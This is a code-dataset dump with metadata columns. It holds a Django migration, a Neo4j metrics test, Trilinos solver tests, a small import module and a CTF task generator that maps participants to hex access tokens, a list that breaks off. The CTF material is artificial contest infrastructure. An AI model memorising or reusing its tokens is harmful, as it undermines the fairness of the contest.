hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4ecf8f2b8c92271aeb43e4139153a51b0548480c | 6,219 | py | Python | opress/migrations/0002_opress_photosizes.py | portalop/django-opress | 7246a5832a084730193900007e5fa67a09151a6d | [
"Apache-2.0"
] | null | null | null | opress/migrations/0002_opress_photosizes.py | portalop/django-opress | 7246a5832a084730193900007e5fa67a09151a6d | [
"Apache-2.0"
] | null | null | null | opress/migrations/0002_opress_photosizes.py | portalop/django-opress | 7246a5832a084730193900007e5fa67a09151a6d | [
"Apache-2.0"
] | null | null | null | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
def opress_initial_photosizes(apps, schema_editor):
PhotoSize = apps.get_model('photologue', 'PhotoSize')
# If there are already Photosizes, then we are upgrading an existing
# installation, we don't want to auto-create some PhotoSizes.
if PhotoSize.objects.all().count() > 3:
return
PhotoSize.objects.create(name='normal',
width=400,
crop=False,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='pagina_icono',
width=330,
height=207,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='pagina_cabecera',
width=730,
height=300,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='bloque_timeline',
width=140,
height=110,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='bloque_ficha',
width=430,
crop=False,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='bloque_ancho_completo',
width=730,
height=300,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='noticias_icono_portada',
width=300,
height=187,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='noticias_icono_ennoticias',
width=397,
height=250,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='noticia_imagen',
width=730,
height=300,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='noticias_relacionadas',
width=397,
height=250,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='agenda_icono',
width=90,
height=90,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='agenda_imagen',
width=730,
height=300,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='portada_destacado',
width=1040,
height=356,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='autor_foto',
width=90,
height=90,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='prensa_icono',
width=200,
height=120,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='documento_icono',
width=300,
height=187,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='bloque_icono',
width=300,
height=187,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='autor_blog_foto',
width=330,
height=207,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='autor_articulo_foto',
width=330,
height=207,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='blog_imagen',
width=480,
height=320,
crop=True,
pre_cache=False,
increment_count=False)
PhotoSize.objects.create(name='recurso_icono',
width=140,
height=140,
crop=True,
pre_cache=False,
increment_count=False)
class Migration(migrations.Migration):
dependencies = [
('opress', '0001_initial'),
]
operations = [
migrations.RunPython(opress_initial_photosizes),
] | 42.02027 | 72 | 0.401833 | 446 | 6,219 | 5.426009 | 0.226457 | 0.145455 | 0.190909 | 0.22562 | 0.711983 | 0.711983 | 0.711983 | 0.711983 | 0.695455 | 0.695455 | 0 | 0.042312 | 0.532562 | 6,219 | 148 | 73 | 42.02027 | 0.790162 | 0.022672 | 0 | 0.678832 | 0 | 0 | 0.057449 | 0.01465 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007299 | false | 0 | 0.014599 | 0 | 0.051095 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09375ee14ce87b27268509bf86a3e39ef57708f9 | 2,616 | py | Python | neo4j/tests/test_neo4j.py | deepakarumugham/integrations-extras | 41d89c429b2d1866241046a4440c55ad14bc7423 | [
"BSD-3-Clause"
] | 1 | 2021-10-04T17:03:54.000Z | 2021-10-04T17:03:54.000Z | neo4j/tests/test_neo4j.py | deepakarumugham/integrations-extras | 41d89c429b2d1866241046a4440c55ad14bc7423 | [
"BSD-3-Clause"
] | 2 | 2022-03-11T02:19:25.000Z | 2022-03-24T18:21:00.000Z | neo4j/tests/test_neo4j.py | deepakarumugham/integrations-extras | 41d89c429b2d1866241046a4440c55ad14bc7423 | [
"BSD-3-Clause"
] | 1 | 2022-03-24T18:09:59.000Z | 2022-03-24T18:09:59.000Z | import pytest
from datadog_checks.base.constants import ServiceCheck
from datadog_checks.neo4j import Neo4jCheck
from .common import METRICS_URL, NEO4J_VERSION
pytestmark = [pytest.mark.integration, pytest.mark.usefixtures('dd_environment')]
def test(aggregator, dd_run_check, instance):
check = Neo4jCheck('neo4j', {}, [instance])
dd_run_check(check)
aggregator.assert_service_check('neo4j.openmetrics.health', ServiceCheck.OK)
if NEO4J_VERSION.startswith('3.5'):
aggregator.assert_metric('neo4j.page_cache.hits.count', tags=['db_name:global', f'endpoint:{METRICS_URL}'])
elif NEO4J_VERSION.startswith('4.0'):
aggregator.assert_metric('neo4j.page_cache.hits.count', tags=['db_name:global', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:neo4j', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:system', f'endpoint:{METRICS_URL}'])
elif NEO4J_VERSION.startswith('4.1'):
aggregator.assert_metric('neo4j.page_cache.hits.count', tags=['db_name:global', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:neo4j', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:system', f'endpoint:{METRICS_URL}'])
elif NEO4J_VERSION.startswith('4.2'):
aggregator.assert_metric('neo4j.page_cache.hits.count', tags=['db_name:global', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:neo4j', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:system', f'endpoint:{METRICS_URL}'])
elif NEO4J_VERSION.startswith('4.3'):
aggregator.assert_metric('neo4j.page_cache.hits.count', tags=['db_name:global', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:neo4j', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:system', f'endpoint:{METRICS_URL}'])
elif NEO4J_VERSION.startswith('4.4'):
aggregator.assert_metric('neo4j.page_cache.hits.count', tags=['db_name:global', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:neo4j', f'endpoint:{METRICS_URL}'])
aggregator.assert_metric('neo4j.check_point.duration', tags=['db_name:system', f'endpoint:{METRICS_URL}'])
else:
raise Exception(f'unknown neo4j_version: {NEO4J_VERSION}')
| 63.804878 | 115 | 0.732798 | 346 | 2,616 | 5.300578 | 0.16763 | 0.092694 | 0.19193 | 0.235551 | 0.768811 | 0.768811 | 0.768811 | 0.768811 | 0.768811 | 0.754089 | 0 | 0.020111 | 0.106651 | 2,616 | 40 | 116 | 65.4 | 0.764656 | 0 | 0 | 0.484848 | 0 | 0 | 0.417431 | 0.305046 | 0 | 0 | 0 | 0 | 0.515152 | 1 | 0.030303 | false | 0 | 0.121212 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
eed09b7bd18bdd0520e81689616bcefbb1d30caa | 11,340 | py | Python | dudley/test/python/run_trilinosSolversOnDudley.py | svn2github/Escript | 9c616a3b164446c65d4b8564ecd04fafd7dcf0d2 | [
"Apache-2.0"
] | null | null | null | dudley/test/python/run_trilinosSolversOnDudley.py | svn2github/Escript | 9c616a3b164446c65d4b8564ecd04fafd7dcf0d2 | [
"Apache-2.0"
] | 1 | 2019-01-14T03:07:43.000Z | 2019-01-14T03:07:43.000Z | dudley/test/python/run_trilinosSolversOnDudley.py | svn2github/Escript | 9c616a3b164446c65d4b8564ecd04fafd7dcf0d2 | [
"Apache-2.0"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2003-2018 by The University of Queensland
# http://www.uq.edu.au
#
# Primary Business: Queensland, Australia
# Licensed under the Apache License, version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Development until 2012 by Earth Systems Science Computational Center (ESSCC)
# Development 2012-2013 by School of Earth Sciences
# Development from 2014 by Centre for Geoscience Computing (GeoComp)
#
##############################################################################
from __future__ import print_function, division
__copyright__="""Copyright (c) 2003-2018 by The University of Queensland
http://www.uq.edu.au
Primary Business: Queensland, Australia"""
__license__="""Licensed under the Open Software License version 3.0
http://www.opensource.org/licenses/osl-3.0.php"""
__url__="https://launchpad.net/escript-finley"
"""
Test suite for PDE solvers on dudley
"""
from test_simplesolve import SimpleSolveTestCase
import esys.escriptcore.utestselect as unittest
from esys.escriptcore.testing import *
from esys.dudley import Rectangle, Brick
from esys.escript import hasFeature, SolverOptions
from esys.escript.linearPDEs import SolverOptions
HAVE_TRILINOS = hasFeature('trilinos')
skip_muelu_long = False #hasFeature("longindex")
# number of elements in the spatial directions
NE0=12
NE1=12
NE2=8
OPTIMIZE=True
@unittest.skipIf(not HAVE_TRILINOS, "Trilinos not available")
class SimpleSolveOnTrilinos(SimpleSolveTestCase):
pass
### BiCGStab + Jacobi
class Test_SimpleSolveDudleyRect_Trilinos_BICGSTAB_Jacobi(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.BICGSTAB
self.preconditioner = SolverOptions.JACOBI
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_BICGSTAB_Jacobi(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.BICGSTAB
self.preconditioner = SolverOptions.JACOBI
def tearDown(self):
del self.domain
### PCG + Jacobi
class Test_SimpleSolveDudleyRect_Trilinos_PCG_Jacobi(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.PCG
self.preconditioner = SolverOptions.JACOBI
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_PCG_Jacobi(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.PCG
self.preconditioner = SolverOptions.JACOBI
def tearDown(self):
del self.domain
### TFQMR + Jacobi
class Test_SimpleSolveDudleyRect_Trilinos_TFQMR_Jacobi(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.TFQMR
self.preconditioner = SolverOptions.JACOBI
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_TFQMR_Jacobi(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.TFQMR
self.preconditioner = SolverOptions.JACOBI
def tearDown(self):
del self.domain
### MINRES + Jacobi
class Test_SimpleSolveDudleyRect_Trilinos_MINRES_Jacobi(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.MINRES
self.preconditioner = SolverOptions.JACOBI
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_MINRES_Jacobi(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.MINRES
self.preconditioner = SolverOptions.JACOBI
def tearDown(self):
del self.domain
### BiCGStab + Gauss-Seidel
class Test_SimpleSolveDudleyRect_Trilinos_BICGSTAB_GaussSeidel(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.BICGSTAB
self.preconditioner = SolverOptions.GAUSS_SEIDEL
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_BICGSTAB_GaussSeidel(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.BICGSTAB
self.preconditioner = SolverOptions.GAUSS_SEIDEL
def tearDown(self):
del self.domain
### PCG + AMG
@unittest.skipIf(skip_muelu_long, "MueLu AMG incompatible with index type long")
class Test_SimpleSolveDudleyRect_Trilinos_PCG_AMG(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.PCG
self.preconditioner = SolverOptions.AMG
def tearDown(self):
del self.domain
@unittest.skipIf(skip_muelu_long, "MueLu AMG incompatible with index type long")
class Test_SimpleSolveDudleyBrick_Trilinos_PCG_AMG(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.PCG
self.preconditioner = SolverOptions.AMG
def tearDown(self):
del self.domain
### TFQMR + Gauss-Seidel
class Test_SimpleSolveDudleyRect_Trilinos_TFQMR_GaussSeidel(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.TFQMR
self.preconditioner = SolverOptions.GAUSS_SEIDEL
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_TFQMR_GaussSeidel(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.TFQMR
self.preconditioner = SolverOptions.GAUSS_SEIDEL
def tearDown(self):
del self.domain
### MINRES + AMG
@unittest.skipIf(skip_muelu_long, "MueLu AMG incompatible with index type long")
class Test_SimpleSolveDudleyRect_Trilinos_MINRES_AMG(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.MINRES
self.preconditioner = SolverOptions.AMG
def tearDown(self):
del self.domain
@unittest.skipIf(skip_muelu_long, "MueLu AMG incompatible with index type long")
class Test_SimpleSolveDudleyBrick_Trilinos_MINRES_AMG(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.MINRES
self.preconditioner = SolverOptions.AMG
def tearDown(self):
del self.domain
### BiCGStab + RILU
class Test_SimpleSolveDudleyRect_Trilinos_BICGSTAB_RILU(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.BICGSTAB
self.preconditioner = SolverOptions.RILU
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_BICGSTAB_RILU(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.BICGSTAB
self.preconditioner = SolverOptions.RILU
def tearDown(self):
del self.domain
### PCG + RILU
class Test_SimpleSolveDudleyRect_Trilinos_PCG_RILU(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.PCG
self.preconditioner = SolverOptions.RILU
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_PCG_RILU(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.PCG
self.preconditioner = SolverOptions.RILU
def tearDown(self):
del self.domain
### TFQMR + RILU
class Test_SimpleSolveDudleyRect_Trilinos_TFQMR_RILU(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, 1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.TFQMR
self.preconditioner = SolverOptions.RILU
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_TFQMR_RILU(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.TFQMR
self.preconditioner = SolverOptions.RILU
def tearDown(self):
del self.domain
### MINRES + RILU
class Test_SimpleSolveDudleyRect_Trilinos_MINRES_RILU(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.MINRES
self.preconditioner = SolverOptions.RILU
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_MINRES_RILU(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.MINRES
self.preconditioner = SolverOptions.RILU
def tearDown(self):
del self.domain
### PCG + ILUT
class Test_SimpleSolveDudleyRect_Trilinos_PCG_ILUT(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Rectangle(NE0, NE1, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.PCG
self.preconditioner = SolverOptions.ILUT
def tearDown(self):
del self.domain
class Test_SimpleSolveDudleyBrick_Trilinos_PCG_ILUT(SimpleSolveOnTrilinos):
def setUp(self):
self.domain = Brick(NE0, NE1, NE2, optimize=OPTIMIZE)
self.package = SolverOptions.TRILINOS
self.method = SolverOptions.PCG
self.preconditioner = SolverOptions.ILUT
def tearDown(self):
del self.domain
if __name__ == '__main__':
run_tests(__name__, exit_on_failure=True)
| 32.869565 | 87 | 0.715608 | 1,203 | 11,340 | 6.618454 | 0.116376 | 0.06531 | 0.0947 | 0.107762 | 0.880558 | 0.841623 | 0.831324 | 0.824416 | 0.824416 | 0.802562 | 0 | 0.012418 | 0.190476 | 11,340 | 344 | 88 | 32.965116 | 0.854902 | 0.058466 | 0 | 0.783898 | 0 | 0 | 0.044238 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.220339 | false | 0.004237 | 0.029661 | 0 | 0.364407 | 0.004237 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
eee08e1d5ed99e6238754958d1d505611a26d17c | 45 | py | Python | Content/Scripts/uepy/umg.py | dfb/uepy | 4d60297e8aa7bbbd097da9464f9163c83b18c733 | [
"BSD-2-Clause"
] | 2 | 2021-03-04T17:55:57.000Z | 2021-03-22T16:09:50.000Z | Content/Scripts/uepy/umg.py | dfb/uepy | 4d60297e8aa7bbbd097da9464f9163c83b18c733 | [
"BSD-2-Clause"
] | null | null | null | Content/Scripts/uepy/umg.py | dfb/uepy | 4d60297e8aa7bbbd097da9464f9163c83b18c733 | [
"BSD-2-Clause"
] | null | null | null | from _uepy import *
from _uepy._umg import *
| 15 | 24 | 0.755556 | 7 | 45 | 4.428571 | 0.571429 | 0.516129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 25 | 22.5 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e1183b98694d63e4d9d01c64be4ecc3c4ba32a25 | 7,537 | py | Python | tasks-deploy/red-button/generate.py | irdkwmnsb/lkshl-ctf | e5c0200ddc8ba73df5f321b87b9763fb1bbaba57 | [
"MIT"
] | 3 | 2021-03-30T06:27:58.000Z | 2021-04-03T17:56:35.000Z | tasks-deploy/red-button/generate.py | irdkwmnsb/lkshl-ctf | e5c0200ddc8ba73df5f321b87b9763fb1bbaba57 | [
"MIT"
] | null | null | null | tasks-deploy/red-button/generate.py | irdkwmnsb/lkshl-ctf | e5c0200ddc8ba73df5f321b87b9763fb1bbaba57 | [
"MIT"
] | null | null | null | TITLE = "Красная кнопка"
STATEMENT_TEMPLATE = '''
[http://red-button.ctf.sicamp.ru:8080/{0}](http://red-button.ctf.sicamp.ru:8080/{0})
'''
def generate(context):
participant = context['participant']
token = tokens[participant.id % len(tokens)]
return TaskStatement(TITLE, STATEMENT_TEMPLATE.format(token))
tokens = ['21444ab76fc804c311d99a7e9ffcbc85', '45bc45d74c18e4f0428374f50af99e2e', 'e6204c309cfdf07bafa10fbded85f77b', '198f868e7a4c272ac600a4e0cb2a0c6a', '56882d25734c49a8acd8117e833a6df2', 'aa1834490208a4a2084c62a886ddca2f', 'c4e2e0c9f0a5bc10a5a00e602c72935e', 'a2fc7b72f8f27dbe22edfe2abd1b5807', 'e066d9c6b8ef5713dac0190951456077', '6294b65f5de96a4b2489461f8189e301', '50ad7a7a4330afa12a515fc7c7cad98a', 'b5542b7cc4fd27897f7f55d122d0ddf8', 'f7d0bcbe8bd19d01f07581e4996ba2c8', '3445d10a65cb088ef2f85caa859f427a', 'b14463e8d7fbe23f62a91dacc9113def', '6c644fe9fa94603b1542703934800fc4', 'd74dc2c8cc0286490e7d0916ea50693b', 'ca46b8ad0840cfa11fb703fffc1e9d53', '34d982cdf0d571a4889f70ad4de030f2', '9539dfbc1487de9d561705c962167c43', 'c041556c1dd644babe261e795556f461', '0ba7534117dc45f85005aebbcf732892', 'dbf4d7623d9c1cc1746830a81fd8d1e1', '82ca7757cc5d99df4be5aa713c410835', '1e8da48809533ed8f2b7d20fd2d23ef1', 'c69d88712f5b6379b2f2557c8c2e9633', '3435d0291e3db60e5b64bf8c31aa9eee', '1d4db509d2cf85591a1954c138ea248e', '36e30de4c10cb765ef23936ef8383445', '78a28d6617212d28985a2e54501f9b5a', 'b480788207644ae594c3e048a6efd463', '9160a90184ffef578cc0f90c7e88e7df', '0cb8b33939b48bfdbc99b8935e178d64', 'e448b4b9f80af486f9a2d6768bca8439', '5d010eb22bb8d67ba98886bc605a5489', '8503a9318bb7b1dc173bd7fc3b1fc039', '03a47a82fe761b2ff5dd9c092c1815e7', '28b42336892aff07fd775426131e1ab2', '197b222047dce241d0a2ff4a8fcf8a7a', '17e0ae03e4af6208944d9769dbcf9582', '0404bc02187b142300e3e015de2347c6', '965d9836a7a121840c40789869563965', '0e136e2299986f6c522a7a1021bc775a', 'defef71741d93b90d18a7e574e18b57e', 'a28f27d2ffeee6d6f7be2ae912a071a0', 'eb35345e6a26a7388b2102c0e1fbadfe', '044488da2b18e5284522673e4855d576', '69dc88f877568971319438af10e87afa', 'b88635c6a486ccc9b0f6516304561b22', '7e5432e63cef3062917b4de46a8eafb5', '35e801fc551f8b89fc74599b9146ce57', 'f28462a1033c9430bd7ca44825f2e7e4', '666ea8d66978f2fb5f89cf9166d086e4', 'e88aec8e4eceda12e6bf9c5dc3eafe40', '571c2baa6b274d219b35ac63a950c6f1', '636e5e9806136f7c955c267e93c86aec', 